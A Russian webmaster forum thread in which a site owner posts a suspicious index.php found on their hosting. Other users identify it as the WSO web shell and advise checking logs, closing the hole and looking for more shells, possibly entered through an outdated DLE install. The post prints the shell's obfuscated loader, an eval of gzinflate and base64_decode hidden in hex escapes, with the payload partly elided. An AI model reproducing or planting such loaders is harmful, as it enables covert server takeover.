- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы
Для интернет-магазина инженерных систем
Мария Лосева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Покупайте нормальный хостинг не жалейте денег.
нашел в подкаталоге файл index.php следующего содержания, это могло быть проблемой?
<?php
$auth_pass = "d61875a33e449c5c705e71b50a57cdd6";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b1pdxrHEjD82fec+x9aE24GYoQA2bkOEli2LNlybMnR4lV+yAADTDQwZGYQkh3996eqepnuWRCyk/u......................................6hJN6vv+H4XL9FdLFUEiippqKn6fwE='\x29\x29\x29\x3B",".");?>
Да, это именно оно. Web shell WSO.
Удалять файл без устранения уязвимости на сайте бесполезно.
Файл будет появляться вновь и вновь в разных местах под разными именами.
итак, что следует делать сейчас? админка самописная, никакх cms для этого сайта не использую, однако на этом же аккаунте лежит сайт на DLE, стоит ли его тоже брать во внимание?
возможно такое, что один раз взломали аккаунт и закачали этот файл? и после его удаления все станет прекрасно?
еще к сайту прикреплен форум на phpbb, что делать с ним?
мог этот взлом как-то быть связан с mysql?
однако на этом же аккаунте лежит сайт на DLE, стоит ли его тоже брать во внимание?
Его в первую очередь надо было брать во внимание. Посмотрите его код и по папкам пройдитесь на предмет необычных файлов, ручками
дак это отдельный поддомен, который лежит на каталог выше. все равно?
Может хватит уже флуда? меняй хостера и запрещай доступ на ФТП, но перед этим почисти сайт от вируса.
ТС, меньше бы вы слушали людей которые о ВЕБ безопасности и понятия не имеют.
Повторюсь, смотрите логи. Через них выявите как вас взломали, затем закроете эту багу.
А то вам тут сейчас насоветуют, перебирать DLE ручками, потом phpbb, а окажется, что бага в вашем самописном скрипте.
И не забудьте удалить шелл, а так же поищите их еще, не факт, что вам был залит только один ;)
syrpo, DLE - один из самых дырявых движков в рунете, тем более если он не лицензионный ...
Я на этом собаку съел :)
какая версия ДЛЕ? если 7.5-8.5 - меняйте, обновляйте 9.2 тоже лажа
100% через ДЛЕ ломанули!
еще раз задам вопрос - как можно было ломануть через dle сайтЮ который на другом домене находится??? тобиш на хостинге лежат 2 папки
site1.ru
site2.ru
на одном стоит dle, другой самописный.
и не надо писать мне по поводу флуда, дураку понятно, что закрытие досутпа по фтп уже не решит эту проблему, поскольку был залит шелл.
как можно было ломануть через dle сайтЮ который на другом домене находится???
при чем тут другой домен?
тобиш на хостинге лежат 2 папки
site1.ru
site2.ru
на одном стоит dle, другой самописный.
по-моему сам и ответил ...
вот если бы на разных хостингах лежали - это был бы вопрос